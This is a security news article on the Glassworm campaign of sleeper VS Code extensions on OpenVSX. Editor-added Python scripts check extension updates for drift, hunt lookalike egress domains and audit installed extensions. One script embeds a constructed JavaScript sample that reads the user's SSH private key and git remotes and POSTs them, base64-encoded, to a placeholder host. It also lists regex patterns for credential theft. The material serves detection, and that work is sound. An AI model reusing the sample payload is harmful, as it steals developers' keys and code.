Glassworm Attackers Deploy 73 Malicious VS Code Extensions in OpenVSX
Security researchers uncovered a sophisticated supply chain attack on April 27, 2026, targeting the OpenVSX marketplace with 73 malicious Visual Studio Code extensions. The campaign, dubbed Glassworm, represents a significant escalation in attacks against developer tools and open-source ecosystems.
The malicious extensions were designed as "sleeper" packages that initially appeared legitimate and functional. After developers had installed them and used them for routine coding tasks, the extensions received updates, delivered through the editor's ordinary automatic extension updates with no further action by the user, that turned them into data-stealing malware. The delayed activation let the extensions pass initial security review and earn developer trust before showing their malicious behavior.
Researchers from multiple security firms identified the campaign after noticing suspicious network traffic patterns from developer workstations. The extensions targeted popular development workflows, including code formatting, syntax highlighting, and project management tools. Each extension was carefully crafted to mimic legitimate functionality while hiding backdoor capabilities that activated only after specific update triggers.
The attack methodology reflects a sophisticated understanding of developer behavior and marketplace security mechanisms. By publishing initially benign extensions and shipping the malicious payload later through updates, the attackers sidestepped automated scans that concentrate on the initial package submission; any review process that does not re-scan every new version, and every dependency a new version pulls in, has the same gap. One correction for defenders looking for indicators: the CISA Known Exploited Vulnerabilities catalog tracks CVE-identified vulnerabilities with remediation due dates and does not carry campaign indicators, so Glassworm indicators of compromise come from the researchers' technical analysis, not from KEV.
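The sleeper pattern above is detectable after the fact by diffing what was reviewed against what is now on disk. The script below is an added example by the page's editor, not code from the article, from the researchers, or from any real extension: it compares two constructed package.json manifests for changes that widen an extension's reach (broader activation events, a changed entry point, new runtime dependencies) and scans two constructed JavaScript sources for capabilities a formatter has no reason to use. The indicator regexes are generic review heuristics, not published Glassworm indicators.

```python
"""Spot 'sleeper' drift in an installed extension: changes between the version
that was reviewed and the version now on disk that widen what it can do.

Added example by the page's editor; not code from the article, the researchers
or any real extension. Manifests and sources below are constructed samples and
the regexes are generic heuristics, not published Glassworm indicators."""
import re

# Constructed baseline manifest: the benign release that passed initial review.
BASE_MANIFEST = {
    "name": "fancy-formatter", "publisher": "acme", "version": "1.0.0",
    "main": "./out/extension.js",
    "activationEvents": ["onLanguage:python"],
    "dependencies": {},
}

# Constructed follow-up release: same name, broader activation, a new dependency.
UPDATED_MANIFEST = {
    "name": "fancy-formatter", "publisher": "acme", "version": "1.0.1",
    "main": "./out/extension.js",
    "activationEvents": ["*"],
    "dependencies": {"tiny-helper": "^2.0.0"},
}

# Constructed sources: a plausible benign entry point and its updated replacement.
BENIGN_JS = """\
const vscode = require('vscode');
function activate(ctx) {
  ctx.subscriptions.push(vscode.commands.registerCommand('fmt.run', () => {
    vscode.window.showInformationMessage('Formatted');
  }));
}
module.exports = { activate };
"""

UPDATED_JS = """\
const vscode = require('vscode');
const os = require('os'), fs = require('fs'), path = require('path');
const https = require('https');
const { execSync } = require('child_process');
function activate(ctx) {
  const key = fs.readFileSync(path.join(os.homedir(), '.ssh', 'id_ed25519'), 'utf8');
  const hosts = execSync('git remote -v').toString();
  const req = https.request({ host: 'updates.example.invalid', method: 'POST' });
  req.end(Buffer.from(key + hosts).toString('base64'));
}
module.exports = { activate };
"""

# Activation events that make an extension run on every editor start.
BROAD_ACTIVATION = {"*", "onStartupFinished"}

# (indicator name, regex): capabilities a formatting extension should not need.
RISKY_PATTERNS = [
    ("child_process", re.compile(r"require\(\s*['\"]child_process['\"]\s*\)")),
    ("homedir", re.compile(r"os\.homedir\(\)")),
    ("ssh_key_path", re.compile(r"['\"]\.ssh['\"]|\.ssh/|id_rsa|id_ed25519")),
    ("https_request", re.compile(r"https?\.request\(")),
    ("base64", re.compile(r"toString\(\s*['\"]base64['\"]\s*\)|from\([^)]*['\"]base64['\"]")),
    ("dynamic_eval", re.compile(r"\beval\(|new Function\(")),
    # Zero-width or BOM characters inside source are a generic obfuscation sign.
    ("invisible_unicode", re.compile("[\u200b\u200c\u200d\u2060\ufeff]")),
]


def manifest_diff(base, new):
    """Return findings for manifest changes that widen an extension's reach."""
    findings = []
    if base.get("version") != new.get("version"):
        findings.append(f"version {base.get('version')} -> {new.get('version')}")
    base_act = set(base.get("activationEvents", []))
    new_act = set(new.get("activationEvents", []))
    if (new_act & BROAD_ACTIVATION) and not (base_act & BROAD_ACTIVATION):
        findings.append(f"activation broadened to {sorted(new_act & BROAD_ACTIVATION)}: runs at every start")
    if base.get("main") != new.get("main"):
        findings.append(f"entry point changed: {base.get('main')} -> {new.get('main')}")
    added = set(new.get("dependencies", {})) - set(base.get("dependencies", {}))
    if added:
        findings.append(f"new runtime dependencies: {sorted(added)}")
    return findings


def scan_source(js):
    """Return [(line_no, indicator, line)] for every risky-pattern hit in JS source."""
    hits = []
    for no, line in enumerate(js.splitlines(), 1):
        for name, rx in RISKY_PATTERNS:
            if rx.search(line):
                hits.append((no, name, line.strip()))
    return hits


def review_update(base_manifest, new_manifest, old_js, new_js):
    """Combine both checks; report only indicators absent from the reviewed build."""
    seen = {name for _, name, _ in scan_source(old_js)}
    new_hits = [h for h in scan_source(new_js) if h[1] not in seen]
    return {"manifest": manifest_diff(base_manifest, new_manifest), "new_indicators": new_hits}


if __name__ == "__main__":
    report = review_update(BASE_MANIFEST, UPDATED_MANIFEST, BENIGN_JS, UPDATED_JS)
    for finding in report["manifest"]:
        print("manifest:", finding)
    for no, name, line in report["new_indicators"]:
        print(f"line {no}: {name}: {line}")
```

Run it against the unpacked extension directory (package.json plus the file named in "main") for the version you approved and the version currently installed; a clean manifest diff with new indicators in the code is exactly the update-only payload the campaign relied on. Minified or bundled output will defeat line-oriented regexes, so treat a sudden switch from readable source to a single bundled file as a finding in itself.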
OpenVSX marketplace administrators were notified immediately and began removing the identified extensions. The marketplace also added safeguards aimed at this pattern: closer monitoring of extension updates rather than only first submissions, and stricter review of versions whose behavior changes after initial publication. One caveat practitioners should keep in mind: VS Code-style extensions have no permission manifest. Every extension runs in the extension host with the full privileges of the user running the editor, so "permissions" in this context can only mean the capabilities a reviewer infers from the code (activation events, native modules, network and file-system calls), not anything the platform enforces.
Developer Workstations and Enterprise Environments at Risk
The Glassworm campaign primarily targeted software developers installing extensions from the OpenVSX marketplace. Stock Visual Studio Code fetches extensions from the Microsoft marketplace by default; OpenVSX is the registry used by VSCodium, Eclipse Theia and other editors built from Code - OSS, and by VS Code installs that have been pointed at it. Affected users include individual developers, development teams at technology companies, and enterprise environments where a VS Code-family editor is the primary IDE. The extensions ran on Windows, macOS and Linux workstations; the reported affected range is VS Code versions 1.85 through 1.88.
Enterprise environments face particularly severe risks because developer workstations often have elevated privileges and access to sensitive codebases, internal repositories and production systems, and an extension inherits all of it: it runs unsandboxed as the developer's own user, with the same access to the file system, keychains and environment variables that the developer has. The malicious extensions were designed to steal browser-stored credentials, SSH keys, API tokens and source code from active projects. Organizations using VS Code for cloud development, DevOps workflows and continuous integration pipelines represent high-value targets for the attackers.
The extensions collected system information including installed software, network configurations, and active development projects. This reconnaissance data could enable follow-up attacks against corporate infrastructure or intellectual property theft. Development teams working on proprietary software, financial applications, or government projects face elevated risks from this type of supply chain compromise.
Security researchers estimate that thousands of developers may have installed at least one of the malicious extensions before their removal. The exact number of affected systems remains under investigation, but telemetry data suggests the extensions were downloaded over 50,000 times across different developer communities and geographic regions.
Immediate Response and Mitigation Steps for Development Teams
Development teams should immediately audit their VS Code installations for any extensions installed from OpenVSX between March 15 and April 27, 2026. The installed set, with versions, is printed by code --list-extensions --show-versions (or the equivalent binary for VSCodium and other forks) and recorded in the editor's extensions directory, while the extension host log shows which extensions activated and when. Organizations can identify potentially compromised systems by reviewing those records and by checking network logs for outbound connections to the command-and-control domains associated with the Glassworm campaign.
System administrators should implement network monitoring to detect data exfiltration attempts from developer workstations. The malicious extensions communicated with remote servers over HTTPS to domains that mimicked legitimate development services, so the payload itself is not inspectable on the wire without TLS interception; DNS query logs, the TLS SNI recorded by the proxy or egress firewall, and per-host upload byte counts are the practical signals. Security teams should block the identified malicious domains and hunt for the same pattern in their own logs: lookalike domains receiving unusual upload volumes from developer hosts.
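The hunt described above, as an added example by the page's editor rather than code from the article or any vendor: it parses constructed egress log lines, decides whether each destination imitates a legitimate development service (typo-squats within one edit of a known name, the same name under a different TLD, or a brand token embedded in an unrelated domain), and ranks the suspicious hosts by bytes uploaded. The legitimate-domain set, the extra "vscode" brand token and the log layout are this example's own assumptions.

```python
"""Flag outbound connections from developer hosts to domains that imitate
legitimate development services, and rank them by upload volume.

Added example by the page's editor; not from the article or any vendor. The
log lines are constructed in a simple 'timestamp src_ip dest_host dest_port
bytes_out' layout (adapt parse_line to your proxy, DNS or Zeek format). The
legitimate-domain set and the extra 'vscode' brand token are our own choices,
and registrable() uses the naive last-two-labels rule, which is wrong for
ccTLDs such as co.uk; use a public-suffix library in production."""
from collections import defaultdict

LEGIT_DOMAINS = {"github.com", "open-vsx.org", "visualstudio.com",
                 "npmjs.org", "npmjs.com", "pypi.org"}
EXTRA_BRANDS = {"vscode"}

# Constructed egress log: one developer workstation over a few minutes.
SAMPLE_LOG = """\
2026-04-20T09:12:01Z 10.0.5.23 api.github.com 443 1843
2026-04-20T09:12:09Z 10.0.5.23 open-vsx.org 443 5120
2026-04-20T09:13:44Z 10.0.5.23 cdn.github-updates.net 443 98304
2026-04-20T09:15:02Z 10.0.5.23 githib.com 443 4096
2026-04-20T09:16:10Z 10.0.5.23 open-vsx.net 443 2048
2026-04-20T09:17:00Z 10.0.5.23 files.pythonhosted.org 443 700
2026-04-20T09:18:31Z 10.0.5.23 vscode-telemetry-sync.com 443 262144
2026-04-20T09:19:05Z 10.0.5.23 vscode-telemetry-sync.com 443 131072
"""


def parse_line(line):
    """Split one constructed log line into its fields."""
    ts, src, host, port, size = line.split()
    return {"ts": ts, "src": src, "host": host, "port": int(port), "bytes_out": int(size)}


def registrable(host):
    """Naive registrable domain: the last two labels (see module docstring)."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def levenshtein(a, b):
    """Edit distance between two strings (standard single-row DP)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_reason(host):
    """Why host resembles a legitimate service, or None if it does not."""
    reg = registrable(host)
    if reg in LEGIT_DOMAINS:
        return None
    sld = reg.split(".")[0]
    for legit in sorted(LEGIT_DOMAINS):
        d = levenshtein(sld, legit.split(".")[0])
        if d <= 1:  # typo-squat, or the same name under a different TLD
            return f"'{sld}' is edit distance {d} from legitimate {legit}"
    brands = {l.split(".")[0] for l in LEGIT_DOMAINS} | EXTRA_BRANDS
    for brand in sorted(brands):
        if brand in sld:  # brand embedded in an unrelated registrable domain
            return f"embeds brand '{brand}' under unrelated domain {reg}"
    return None


def find_lookalikes(log_text):
    """Aggregate upload bytes per suspicious host; largest uploaders first."""
    bytes_out, reasons = defaultdict(int), {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        reason = lookalike_reason(rec["host"])
        if reason:
            bytes_out[rec["host"]] += rec["bytes_out"]
            reasons[rec["host"]] = reason
    return sorted(({"host": h, "bytes_out": b, "reason": reasons[h]} for h, b in bytes_out.items()),
                  key=lambda r: r["bytes_out"], reverse=True)


if __name__ == "__main__":
    for r in find_lookalikes(SAMPLE_LOG):
        print(f"{r['bytes_out']:>8} B  {r['host']:<28} {r['reason']}")
```

The heuristics only see what is in the legitimate-domain set, so keep that list curated for the services your developers actually use; a service that is absent will neither be cleared nor flagged unless it happens to resemble a listed one. Volume ranking is what makes this useful for triage: an exfiltration channel stands out by uploading far more than a formatter ever would.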
Affected developers must immediately revoke and reissue all stored credentials, including GitHub tokens, cloud service API keys, database passwords and SSH keys that may have been readable by the malicious extensions; revocation matters more than generating a replacement, since a copied key stays valid until it is removed from every service that trusts it. Organizations should rotate service account credentials and review access logs for unauthorized activity during the potential compromise window.
The researchers' detailed technical analysis provides specific indicators of compromise and detection methods for security teams. VS Code users should update to the latest version and make use of the controls it already offers: Workspace Trust, which disables or restricts extensions in folders the user has not marked as trusted, and the settings that limit which extensions may be installed. There is no built-in per-extension network monitor, so visibility into what an extension sends has to come from host or network telemetry.
Long-term mitigation strategies include stricter controls over extension installation in enterprise environments, application allowlisting for development tools, and regular security reviews of installed extensions. In practice that means pinning an approved set of extensions (VS Code's extensions.allowed setting can be pushed through enterprise policy), turning off automatic extension updates so that a new version is reviewed before it runs, and keeping a baseline of each approved extension's manifest and code to diff against. Organizations should also consider private extension marketplaces or curated extension repositories to reduce exposure to supply chain attacks targeting public marketplaces.
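The audit step and the allowlist control above combine naturally into one inventory check. The script below is an added example by the page's editor, not code from the article, VS Code or OpenVSX: it reads the editor's extensions.json, flags extensions installed inside the campaign window (or with no install timestamp at all, which cannot be cleared by date) and extensions absent from a team allowlist. It assumes the extensions directory is ~/.vscode/extensions for VS Code or ~/.vscode-oss/extensions for VSCodium and other Code - OSS builds, and that entries carry identifier.id, version and metadata.installedTimestamp in milliseconds; confirm that shape against your editor version. The sample entries and the allowlist are constructed.

```python
"""Inventory the extensions a VS Code-family editor has installed and flag
those installed inside the campaign window or missing from an allowlist.

Added example by the page's editor; not from the article, VS Code or OpenVSX.
Assumptions: the extensions directory (~/.vscode/extensions for VS Code,
~/.vscode-oss/extensions for VSCodium and other Code - OSS builds) holds an
extensions.json array whose entries carry identifier.id, version and
metadata.installedTimestamp in milliseconds; verify against your editor
version. Sample entries and the allowlist are constructed."""
import json
from datetime import datetime, timezone
from pathlib import Path

WINDOW_START = datetime(2026, 3, 15, tzinfo=timezone.utc)
WINDOW_END = datetime(2026, 4, 27, 23, 59, 59, tzinfo=timezone.utc)

# Constructed stand-in for extensions.json, in the assumed shape.
SAMPLE_EXTENSIONS_JSON = json.dumps([
    {"identifier": {"id": "esbenp.prettier-vscode"}, "version": "10.4.0",
     "metadata": {"installedTimestamp": 1700000000000}},  # Nov 2023
    {"identifier": {"id": "acme.fancy-formatter"}, "version": "1.2.3",
     "metadata": {"installedTimestamp": 1775000000000}},  # 2026-03-31
    {"identifier": {"id": "acme.project-helper"}, "version": "0.9.1",
     "metadata": {"installedTimestamp": 1776000000000}},  # 2026-04-12
    {"identifier": {"id": "someone.legacy-tool"}, "version": "3.0.0"},  # no metadata
])

# Constructed allowlist of publisher.name identifiers approved for this team.
ALLOWLIST = {"esbenp.prettier-vscode", "acme.project-helper", "someone.legacy-tool"}


def load_entries(text):
    """Parse extensions.json content into a list of entries."""
    return json.loads(text)


def load_extensions_json(extensions_dir):
    """Read the real extensions.json from an extensions directory."""
    return load_entries((Path(extensions_dir).expanduser() / "extensions.json").read_text())


def installed_at(entry):
    """UTC install time from metadata.installedTimestamp, or None if absent."""
    ms = entry.get("metadata", {}).get("installedTimestamp")
    return None if ms is None else datetime.fromtimestamp(ms / 1000, tz=timezone.utc)


def audit(entries, allowlist, start=WINDOW_START, end=WINDOW_END):
    """Return one finding per extension that needs a look, with its reasons."""
    allowed = {a.lower() for a in allowlist}
    findings = []
    for entry in entries:
        ext_id = entry["identifier"]["id"].lower()
        reasons = []
        when = installed_at(entry)
        if when is None:
            # Without a timestamp the entry cannot be cleared by date.
            reasons.append("no install timestamp: treat as in-window")
        elif start <= when <= end:
            reasons.append(f"installed in window on {when.date()}")
        if ext_id not in allowed:
            reasons.append("not on allowlist")
        if reasons:
            findings.append({"id": ext_id, "version": entry.get("version"), "reasons": reasons})
    return findings


if __name__ == "__main__":
    import sys
    entries = (load_extensions_json(sys.argv[1]) if len(sys.argv) > 1
               else load_entries(SAMPLE_EXTENSIONS_JSON))
    for f in audit(entries, ALLOWLIST):
        print(f"{f['id']}@{f['version']}: " + "; ".join(f["reasons"]))
```

Pass the extensions directory as the first argument to audit a real workstation; with no argument it runs on the constructed sample. The install timestamp only says when the extension first arrived, not when it last updated, so an extension installed before the window but updated inside it still needs the manifest and source diff described earlier; and because extensions.json does not reliably record which registry an extension came from, treat every gallery install on an OpenVSX-configured editor as an OpenVSX install.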